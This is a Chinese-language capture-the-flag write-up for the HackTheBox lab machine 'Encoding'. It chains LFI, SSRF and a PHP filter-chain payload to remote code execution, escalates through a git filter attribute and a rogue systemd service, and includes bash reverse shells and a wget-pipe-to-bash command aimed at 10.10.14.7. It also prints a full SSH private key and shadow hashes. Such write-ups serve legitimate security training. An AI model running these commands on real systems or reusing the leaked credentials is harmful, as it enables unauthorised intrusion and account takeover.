基本信息
端口扫描 22和80:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 $ nmap -sC -sV -Pn 10.10.11.198 Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 13:38 CST Nmap scan report for 10.10.11.198 Host is up (0.096s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA) |_ 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) |_http-server-header: Apache/2.4.52 (Ubuntu) |_http-title: HaxTables Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 33.02 seconds
80 API中得到域名信息:
子域名扫描 根据得到的域名格式添加hosts,继续探测子域名:
1 10.10.11.198 haxtables.htb api.haxtables.htb
发现另一个image:
1 2 3 4 ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://haxtables.htb/" -H 'Host: FUZZ.haxtables.htb' -fs 1999 api [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 111ms] image [Status: 403, Size: 284, Words: 20, Lines: 10, Duration: 95ms]
image.haxtables.htb 添加hosts,直接访问是403:
api.haxtables.htb 根据给出的api调用代码调用api,发现一个读取远程文件的调用方式,这里可以LFI:
LFI
image .git 一步步读文件,utils里发现git:
1 2 3 file:///var/www/html/index.php file:///var/www/image/index.php file:///var/www/image/utils.php
image.haxtables.htb 通过git dump代码,但因为image的403限制,需要改下工具代码:
修改后的版本:
然后dump git信息:
1 ./gitdumper.sh http://image.haxtables.htb/.git/ image_git_dump
git信息的到的一些文件名,继续使用前面的LFI读代码:
actions/action_handler.php action_handler中发现LFI:
1 2 3 4 5 6 7 8 9 10 11 12 13 <?php include_once 'utils.php' ;if (isset ($_GET['page' ])) { $page = $_GET['page' ]; include ($page); } else { echo jsonify(['message' => 'No page specified!' ]); } ?>
handler.php 主站的handler中发现SSRF,接收到的uri_path会进入make_api_call,拼接在中间,所以也需要处理一下:
1 2 file:///var/www/html/handler.php file:///var/www/api/utils.php
SSRF + LFI 所以可以通过handler的SSRF去调用image的LFI:
LFI to RCE 参考资料,和Pollution那台类似:
1 2 3 4 # m bash -i >& /dev/tcp/10.10.14.7/4444 0>&1 python3 php_filter_chain_generator.py --chain '<?=`wget -O - 10.10.14.7/m|bash`?>'
然后替换page参数,得到shell:
svc 得到的www shell可以以svc用户权限运行git-commit.sh:
根据代码,用于git commit,可以通过附加Attribute执行其他操作:
我们可以在/var/www/image文件夹中初始化一个新的版本库,为所有.php文件设置缩进过滤器,设置一个运行bash文件的命令来生成反向shell,最后,以svc用户身份运行git-commit.sh文件。
1 2 3 4 5 6 7 8 9 10 11 # /tmp/shell # !/bin/bash bash -i >& /dev/tcp/10.10.14.7/4444 0>&1 chmod +x /tmp/shell cd /var/www/image git init echo '*.php filter=indent' > .git/info/attributes git config filter.indent.clean /tmp/shell sudo -u svc /var/www/image/scripts/git-commit.sh
user flag svc用户目录里可以获取私钥方便后续操作:
svc_id_rsa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 -----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY-----
提权 & root flag 可以重启任意服务,那就是自己创建一个服务利用了
1 2 3 4 5 6 7 echo '[Service] Type=oneshot ExecStart=bash /tmp/shell [Install] WantedBy=multi-user.target' > /etc/systemd/system/root.service sudo systemctl restart root
shadow 1 2 root:$y$j9T$YrcgmNEZARoBVHavwBOPQ/$wIZaX9iidgZlQcbd8FsfhAK4e9f6CCS0R8zTG7iGZWC:19307:0:99999:7::: svc:$y$j9T$T1FiJZK9ftARU8F2cRXIo/$l4ru4RucHv80YP2Nv2KwwZbJmem.ongM5S8FbfbOTp9:19307:0:99999:7:::
参考资料
最終更新:2023-04-17 08:51:41
水平不济整日被虐这也不会那也得学,脑子太蠢天天垫底这看不懂那学不会